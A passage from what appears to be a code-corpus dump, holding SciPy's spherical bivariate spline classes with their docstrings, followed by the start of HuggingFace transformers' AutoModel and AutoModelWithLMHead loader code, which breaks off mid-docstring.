obeyed.\n dtheta : int, optional\n Order of theta-derivative\n\n .. versionadded:: 0.14.0\n dphi : int, optional\n Order of phi-derivative\n\n .. versionadded:: 0.14.0\n \"\"\"\n return self.__call__(theta, phi, dtheta=dtheta, dphi=dphi, grid=False)\n\n\nclass SmoothSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Smooth bivariate spline approximation in spherical coordinates.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n theta, phi, r : array_like\n 1-D sequences of data points (order is not important). Coordinates\n must be given in radians. Theta must lie within the interval (0, pi),\n and phi must lie within the interval (0, 2pi).\n w : array_like, optional\n Positive 1-D sequence of weights.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w(i)*(r(i) - s(theta(i), phi(i))))**2, axis=0) <= s``\n Default ``s=len(w)`` which should be a good value if 1/w[i] is an\n estimate of the standard deviation of r[i].\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n Notes\n -----\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/sphere.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid (the input data does not\n have to be on a grid):\n\n >>> theta = np.linspace(0., np.pi, 7)\n >>> phi = np.linspace(0., 2*np.pi, 9)\n >>> data = np.empty((theta.shape[0], phi.shape[0]))\n >>> data[:,0], data[0,:], data[-1,:] = 0., 0., 0.\n >>> data[1:-1,1], data[1:-1,-1] = 1., 1.\n >>> data[1,1:-1], data[-2,1:-1] = 1., 1.\n >>> data[2:-2,2], data[2:-2,-2] = 2., 2.\n >>> data[2,2:-2], data[-3,2:-2] = 2., 2.\n >>> data[3,3:-2] = 3.\n >>> data = np.roll(data, 4, 1)\n\n We need to set up the interpolator object\n\n >>> lats, lons = np.meshgrid(theta, phi)\n >>> from scipy.interpolate import SmoothSphereBivariateSpline\n >>> lut = SmoothSphereBivariateSpline(lats.ravel(), lons.ravel(),\n ... data.T.ravel(), s=3.5)\n\n As a first test, we'll see what the algorithm returns when run on the\n input coordinates\n\n >>> data_orig = lut(theta, phi)\n\n Finally we interpolate the data to a finer grid\n\n >>> fine_lats = np.linspace(0., np.pi, 70)\n >>> fine_lons = np.linspace(0., 2 * np.pi, 90)\n\n >>> data_smth = lut(fine_lats, fine_lons)\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(131)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(132)\n >>> ax2.imshow(data_orig, interpolation='nearest')\n >>> ax3 = fig.add_subplot(133)\n >>> ax3.imshow(data_smth, interpolation='nearest')\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, theta, phi, r, w=None, s=0., eps=1E-16):\n if np.issubclass_(w, float):\n w = ones(len(theta)) * w\n nt_, tt_, np_, tp_, c, fp, ier = dfitpack.spherfit_smth(theta, phi,\n r, w=w, s=s,\n eps=eps)\n if ier not in [0, -1, -2]:\n message = _spherefit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(message)\n\n self.fp = fp\n self.tck = tt_[:nt_], tp_[:np_], c[:(nt_ - 4) * (np_ - 4)]\n self.degrees = (3, 3)\n\n\nclass LSQSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Weighted least-squares bivariate spline approximation in spherical\n coordinates.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n theta, phi, r : array_like\n 1-D sequences of data points (order is not important). Coordinates\n must be given in radians. Theta must lie within the interval (0, pi),\n and phi must lie within the interval (0, 2pi).\n tt, tp : array_like\n Strictly ordered 1-D sequences of knots coordinates.\n Coordinates must satisfy ``0 < tt[i] < pi``, ``0 < tp[i] < 2*pi``.\n w : array_like, optional\n Positive 1-D sequence of weights, of the same length as `theta`, `phi`\n and `r`.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n Notes\n -----\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/sphere.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid (the input data does not\n have to be on a grid):\n\n >>> theta = np.linspace(0., np.pi, 7)\n >>> phi = np.linspace(0., 2*np.pi, 9)\n >>> data = np.empty((theta.shape[0], phi.shape[0]))\n >>> data[:,0], data[0,:], data[-1,:] = 0., 0., 0.\n >>> data[1:-1,1], data[1:-1,-1] = 1., 1.\n >>> data[1,1:-1], data[-2,1:-1] = 1., 1.\n >>> data[2:-2,2], data[2:-2,-2] = 2., 2.\n >>> data[2,2:-2], data[-3,2:-2] = 2., 2.\n >>> data[3,3:-2] = 3.\n >>> data = np.roll(data, 4, 1)\n\n We need to set up the interpolator object. Here, we must also specify the\n coordinates of the knots to use.\n\n >>> lats, lons = np.meshgrid(theta, phi)\n >>> knotst, knotsp = theta.copy(), phi.copy()\n >>> knotst[0] += .0001\n >>> knotst[-1] -= .0001\n >>> knotsp[0] += .0001\n >>> knotsp[-1] -= .0001\n >>> from scipy.interpolate import LSQSphereBivariateSpline\n >>> lut = LSQSphereBivariateSpline(lats.ravel(), lons.ravel(),\n ... data.T.ravel(), knotst, knotsp)\n\n As a first test, we'll see what the algorithm returns when run on the\n input coordinates\n\n >>> data_orig = lut(theta, phi)\n\n Finally we interpolate the data to a finer grid\n\n >>> fine_lats = np.linspace(0., np.pi, 70)\n >>> fine_lons = np.linspace(0., 2*np.pi, 90)\n\n >>> data_lsq = lut(fine_lats, fine_lons)\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(131)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(132)\n >>> ax2.imshow(data_orig, interpolation='nearest')\n >>> ax3 = fig.add_subplot(133)\n >>> ax3.imshow(data_lsq, interpolation='nearest')\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, theta, phi, r, tt, tp, w=None, eps=1E-16):\n if np.issubclass_(w, float):\n w = ones(len(theta)) * w\n nt_, np_ = 8 + len(tt), 8 + len(tp)\n tt_, tp_ = zeros((nt_,), float), zeros((np_,), float)\n tt_[4:-4], tp_[4:-4] = tt, tp\n tt_[-4:], tp_[-4:] = np.pi, 2. * np.pi\n tt_, tp_, c, fp, ier = dfitpack.spherfit_lsq(theta, phi, r, tt_, tp_,\n w=w, eps=eps)\n if ier < -2:\n deficiency = 6 + (nt_ - 8) * (np_ - 7) + ier\n message = _spherefit_messages.get(-3) % (deficiency, -ier)\n warnings.warn(message)\n elif ier not in [0, -1, -2]:\n message = _spherefit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(message)\n\n self.fp = fp\n self.tck = tt_, tp_, c\n self.degrees = (3, 3)\n\n\n_spfit_messages = _surfit_messages.copy()\n_spfit_messages[10] = \"\"\"\nERROR: on entry, the input data are controlled on validity\n the following restrictions must be satisfied.\n -1<=iopt(1)<=1, 0<=iopt(2)<=1, 0<=iopt(3)<=1,\n -1<=ider(1)<=1, 0<=ider(2)<=1, ider(2)=0 if iopt(2)=0.\n -1<=ider(3)<=1, 0<=ider(4)<=1, ider(4)=0 if iopt(3)=0.\n mu >= mumin (see above), mv >= 4, nuest >=8, nvest >= 8,\n kwrk>=5+mu+mv+nuest+nvest,\n lwrk >= 12+nuest*(mv+nvest+3)+nvest*24+4*mu+8*mv+max(nuest,mv+nvest)\n 0< u(i-1)<u(i)< pi,i=2,..,mu,\n -pi<=v(1)< pi, v(1)<v(i-1)<v(i)<v(1)+2*pi, i=3,...,mv\n if iopt(1)=-1: 8<=nu<=min(nuest,mu+6+iopt(2)+iopt(3))\n 0<tu(5)<tu(6)<...<tu(nu-4)< pi\n 8<=nv<=min(nvest,mv+7)\n v(1)<tv(5)<tv(6)<...<tv(nv-4)<v(1)+2*pi\n the schoenberg-whitney conditions, i.e. there must be\n subset of grid co-ordinates uu(p) and vv(q) such that\n tu(p) < uu(p) < tu(p+4) ,p=1,...,nu-4\n (iopt(2)=1 and iopt(3)=1 also count for a uu-value\n tv(q) < vv(q) < tv(q+4) ,q=1,...,nv-4\n (vv(q) is either a value v(j) or v(j)+2*pi)\n if iopt(1)>=0: s>=0\n if s=0: nuest>=mu+6+iopt(2)+iopt(3), nvest>=mv+7\n if one of these conditions is found to be violated,control is\n immediately repassed to the calling program. in that case there is no\n approximation returned.\"\"\"\n\n\nclass RectSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Bivariate spline approximation over a rectangular mesh on a sphere.\n\n Can be used for smoothing data.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n u : array_like\n 1-D array of latitude coordinates in strictly ascending order.\n Coordinates must be given in radians and lie within the interval\n (0, pi).\n v : array_like\n 1-D array of longitude coordinates in strictly ascending order.\n Coordinates must be given in radians, and must lie within (0, 2pi).\n r : array_like\n 2-D array of data with shape ``(u.size, v.size)``.\n s : float, optional\n Positive smoothing factor defined for estimation condition\n (``s=0`` is for interpolation).\n pole_continuity : bool or (bool, bool), optional\n Order of continuity at the poles ``u=0`` (``pole_continuity[0]``) and\n ``u=pi`` (``pole_continuity[1]``). The order of continuity at the pole\n will be 1 or 0 when this is True or False, respectively.\n Defaults to False.\n pole_values : float or (float, float), optional\n Data values at the poles ``u=0`` and ``u=pi``. Either the whole\n parameter or each individual element can be None. Defaults to None.\n pole_exact : bool or (bool, bool), optional\n Data value exactness at the poles ``u=0`` and ``u=pi``. If True, the\n value is considered to be the right function value, and it will be\n fitted exactly. If False, the value will be considered to be a data\n value just like the other data values. Defaults to False.\n pole_flat : bool or (bool, bool), optional\n For the poles at ``u=0`` and ``u=pi``, specify whether or not the\n approximation has vanishing derivatives. Defaults to False.\n\n See Also\n --------\n RectBivariateSpline : bivariate spline approximation over a rectangular\n mesh\n\n Notes\n -----\n Currently, only the smoothing spline approximation (``iopt[0] = 0`` and\n ``iopt[0] = 1`` in the FITPACK routine) is supported. The exact\n least-squares spline approximation is not implemented yet.\n\n When actually performing the interpolation, the requested `v` values must\n lie within the same length 2pi interval that the original `v` values were\n chosen from.\n\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/spgrid.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid\n\n >>> lats = np.linspace(10, 170, 9) * np.pi / 180.\n >>> lons = np.linspace(0, 350, 18) * np.pi / 180.\n >>> data = np.dot(np.atleast_2d(90. - np.linspace(-80., 80., 18)).T,\n ... np.atleast_2d(180. - np.abs(np.linspace(0., 350., 9)))).T\n\n We want to interpolate it to a global one-degree grid\n\n >>> new_lats = np.linspace(1, 180, 180) * np.pi / 180\n >>> new_lons = np.linspace(1, 360, 360) * np.pi / 180\n >>> new_lats, new_lons = np.meshgrid(new_lats, new_lons)\n\n We need to set up the interpolator object\n\n >>> from scipy.interpolate import RectSphereBivariateSpline\n >>> lut = RectSphereBivariateSpline(lats, lons, data)\n\n Finally we interpolate the data. The `RectSphereBivariateSpline` object\n only takes 1-D arrays as input, therefore we need to do some reshaping.\n\n >>> data_interp = lut.ev(new_lats.ravel(),\n ... new_lons.ravel()).reshape((360, 180)).T\n\n Looking at the original and the interpolated data, one can see that the\n interpolant reproduces the original data very well:\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(211)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(212)\n >>> ax2.imshow(data_interp, interpolation='nearest')\n >>> plt.show()\n\n Chosing the optimal value of ``s`` can be a delicate task. Recommended\n values for ``s`` depend on the accuracy of the data values. If the user\n has an idea of the statistical errors on the data, she can also find a\n proper estimate for ``s``. By assuming that, if she specifies the\n right ``s``, the interpolator will use a spline ``f(u,v)`` which exactly\n reproduces the function underlying the data, she can evaluate\n ``sum((r(i,j)-s(u(i),v(j)))**2)`` to find a good estimate for this ``s``.\n For example, if she knows that the statistical errors on her\n ``r(i,j)``-values are not greater than 0.1, she may expect that a good\n ``s`` should have a value not larger than ``u.size * v.size * (0.1)**2``.\n\n If nothing is known about the statistical error in ``r(i,j)``, ``s`` must\n be determined by trial and error. The best is then to start with a very\n large value of ``s`` (to determine the least-squares polynomial and the\n corresponding upper bound ``fp0`` for ``s``) and then to progressively\n decrease the value of ``s`` (say by a factor 10 in the beginning, i.e.\n ``s = fp0 / 10, fp0 / 100, ...`` and more carefully as the approximation\n shows more detail) to obtain closer fits.\n\n The interpolation results for different values of ``s`` give some insight\n into this process:\n\n >>> fig2 = plt.figure()\n >>> s = [3e9, 2e9, 1e9, 1e8]\n >>> for ii in xrange(len(s)):\n ... lut = RectSphereBivariateSpline(lats, lons, data, s=s[ii])\n ... data_interp = lut.ev(new_lats.ravel(),\n ... new_lons.ravel()).reshape((360, 180)).T\n ... ax = fig2.add_subplot(2, 2, ii+1)\n ... ax.imshow(data_interp, interpolation='nearest')\n ... ax.set_title(\"s = %g\" % s[ii])\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, u, v, r, s=0., pole_continuity=False, pole_values=None,\n pole_exact=False, pole_flat=False):\n iopt = np.array([0, 0, 0], dtype=int)\n ider = np.array([-1, 0, -1, 0], dtype=int)\n if pole_values is None:\n pole_values = (None, None)\n elif isinstance(pole_values, (float, np.float32, np.float64)):\n pole_values = (pole_values, pole_values)\n if isinstance(pole_continuity, bool):\n pole_continuity = (pole_continuity, pole_continuity)\n if isinstance(pole_exact, bool):\n pole_exact = (pole_exact, pole_exact)\n if isinstance(pole_flat, bool):\n pole_flat = (pole_flat, pole_flat)\n\n r0, r1 = pole_values\n iopt[1:] = pole_continuity\n if r0 is None:\n ider[0] = -1\n else:\n ider[0] = pole_exact[0]\n\n if r1 is None:\n ider[2] = -1\n else:\n ider[2] = pole_exact[1]\n\n ider[1], ider[3] = pole_flat\n\n u, v = np.ravel(u), np.ravel(v)\n if not np.all(np.diff(u) > 0.0):\n raise TypeError('u must be strictly increasing')\n if not np.all(np.diff(v) > 0.0):\n raise TypeError('v must be strictly increasing')\n\n if not u.size == r.shape[0]:\n raise TypeError('u dimension of r must have same number of '\n 'elements as u')\n if not v.size == r.shape[1]:\n raise TypeError('v dimension of r must have same number of '\n 'elements as v')\n\n if pole_continuity[1] is False and pole_flat[1] is True:\n raise TypeError('if pole_continuity is False, so must be '\n 'pole_flat')\n if pole_continuity[0] is False and pole_flat[0] is True:\n raise TypeError('if pole_continuity is False, so must be '\n 'pole_flat')\n\n r = np.ravel(r)\n nu, tu, nv, tv, c, fp, ier = dfitpack.regrid_smth_spher(iopt, ider,\n u.copy(), v.copy(), r.copy(), r0, r1, s)\n\n if ier not in [0, -1, -2]:\n msg = _spfit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(msg)\n\n self.fp = fp\n self.tck = tu[:nu], tv[:nv], c[:(nu - 4) * (nv-4)]\n self.degrees = (3, 3)\n"} {"ext": "py", "sha": "1a30ea46239fd94a37b77ac11726303b6c87fcbb", "content": "# coding=utf-8\n# Copyright 2018 The HuggingFace Inc. team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Auto Model class. \"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\n\nfrom .modeling_bert import BertModel, BertForMaskedLM, BertForSequenceClassification, BertForQuestionAnswering, BERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_openai import OpenAIGPTModel, OpenAIGPTLMHeadModel, OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_gpt2 import GPT2Model, GPT2LMHeadModel, GPT2_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_ctrl import CTRLModel, CTRLLMHeadModel, CTRL_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_transfo_xl import TransfoXLModel, TransfoXLLMHeadModel, TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_xlnet import XLNetModel, XLNetLMHeadModel, XLNetForSequenceClassification, XLNetForQuestionAnswering, XLNET_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_xlm import XLMModel, XLMWithLMHeadModel, XLMForSequenceClassification, XLMForQuestionAnswering, XLM_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_roberta import RobertaModel, RobertaForMaskedLM, RobertaForSequenceClassification, ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_distilbert import DistilBertModel, DistilBertForQuestionAnswering, DistilBertForMaskedLM, DistilBertForSequenceClassification, DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_camembert import CamembertModel, CamembertForMaskedLM, CamembertForSequenceClassification, CamembertForMultipleChoice, CAMEMBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_albert import AlbertModel, AlbertForMaskedLM, AlbertForSequenceClassification, AlbertForQuestionAnswering, ALBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_t5 import T5Model, T5WithLMHeadModel, T5_PRETRAINED_MODEL_ARCHIVE_MAP\n\nfrom .modeling_utils import PreTrainedModel, SequenceSummary\n\nfrom .file_utils import add_start_docstrings\n\nlogger = logging.getLogger(__name__)\n\n\nALL_PRETRAINED_MODEL_ARCHIVE_MAP = dict((key, value)\n for pretrained_map in [\n BERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP,\n TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP,\n GPT2_PRETRAINED_MODEL_ARCHIVE_MAP,\n CTRL_PRETRAINED_MODEL_ARCHIVE_MAP,\n XLNET_PRETRAINED_MODEL_ARCHIVE_MAP,\n XLM_PRETRAINED_MODEL_ARCHIVE_MAP,\n ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP,\n DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n ALBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n CAMEMBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n T5_PRETRAINED_MODEL_ARCHIVE_MAP,\n ]\n for key, value, in pretrained_map.items())\n\n\nclass AutoModel(object):\n r\"\"\"\n :class:`~transformers.AutoModel` is a generic model class\n that will be instantiated as one of the base model classes of the library\n when created with the `AutoModel.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The base model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5Model (T5 model)\n - contains `distilbert`: DistilBertModel (DistilBERT model)\n - contains `albert`: AlbertModel (ALBERT model)\n - contains `camembert`: CamembertModel (CamemBERT model)\n - contains `roberta`: RobertaModel (RoBERTa model)\n - contains `bert`: BertModel (Bert model)\n - contains `openai-gpt`: OpenAIGPTModel (OpenAI GPT model)\n - contains `gpt2`: GPT2Model (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLModel (Transformer-XL model)\n - contains `xlnet`: XLNetModel (XLNet model)\n - contains `xlm`: XLMModel (XLM model)\n - contains `ctrl`: CTRLModel (Salesforce CTRL model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModel is designed to be instantiated \"\n \"using the `AutoModel.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the base model classes of the library\n from a pre-trained model configuration.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5Model (T5 model)\n - contains `distilbert`: DistilBertModel (DistilBERT model)\n - contains `albert`: AlbertModel (ALBERT model)\n - contains `camembert`: CamembertModel (CamemBERT model)\n - contains `roberta`: RobertaModel (RoBERTa model)\n - contains `bert`: BertModel (Bert model)\n - contains `openai-gpt`: OpenAIGPTModel (OpenAI GPT model)\n - contains `gpt2`: GPT2Model (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLModel (Transformer-XL model)\n - contains `xlnet`: XLNetModel (XLNet model)\n - contains `xlm`: XLMModel (XLM model)\n - contains `ctrl`: CTRLModel (Salesforce CTRL model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModel.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModel.from_pretrained('./test/bert_model/') # E.g. model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModel.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModel.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 't5' in pretrained_model_name_or_path:\n return T5Model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'distilbert' in pretrained_model_name_or_path:\n return DistilBertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'openai-gpt' in pretrained_model_name_or_path:\n return OpenAIGPTModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'gpt2' in pretrained_model_name_or_path:\n return GPT2Model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'transfo-xl' in pretrained_model_name_or_path:\n return TransfoXLModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'ctrl' in pretrained_model_name_or_path:\n return CTRLModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n raise ValueError(\"Unrecognized model identifier in {}. Should contains one of \"\n \"'bert', 'openai-gpt', 'gpt2', 'transfo-xl', 'xlnet', \"\n \"'xlm', 'roberta, 'ctrl', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelWithLMHead(object):\n r\"\"\"\n :class:`~transformers.AutoModelWithLMHead` is a generic model class\n that will be instantiated as one of the language modeling model classes of the library\n when created with the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5ModelWithLMHead (T5 model)\n - contains `distilbert`: DistilBertForMaskedLM (DistilBERT model)\n - contains `albert`: AlbertForMaskedLM (ALBERT model)\n - contains `camembert`: CamembertForMaskedLM (CamemBERT model)\n - contains `roberta`: RobertaForMaskedLM (RoBERTa model)\n - contains `bert`: BertForMaskedLM (Bert model)\n - contains `openai-gpt`: OpenAIGPTLMHeadModel (OpenAI GPT model)\n - contains `gpt2`: GPT2LMHeadModel (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLLMHeadModel (Transformer-XL model)\n - contains `xlnet`: XLNetLMHeadModel (XLNet model)\n - contains `xlm`: XLMWithLMHeadModel (XLM model)\n - contains `ctrl`: CTRLLMHeadModel (Salesforce CTRL model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModelWithLMHead is designed to be instantiated \"\n \"using the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the language modeling model classes of the library\n from a pre-trained model configuration.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5ModelWithLMHead (T5 model)\n - contains `distilbert`: DistilBertForMaskedLM (DistilBERT model)\n - contains `albert`: AlbertForMaskedLM (ALBERT model)\n - contains `camembert`: CamembertForMaskedLM (CamemBERT model)\n - contains `roberta`: RobertaForMaskedLM (RoBERTa model)\n - contains `bert`: BertForMaskedLM (Bert model)\n - contains `openai-gpt`: OpenAIGPTLMHeadModel (OpenAI GPT model)\n - contains `gpt2`: GPT2LMHeadModel (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLLMHeadModel (Transformer-XL model)\n - contains `xlnet`: XLNetLMHeadModel (XLNet model)\n - contains `xlm`: XLMWithLMHeadModel (XLM model)\n - contains `ctrl`: CTRLLMHeadModel (Salesforce CTRL model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the 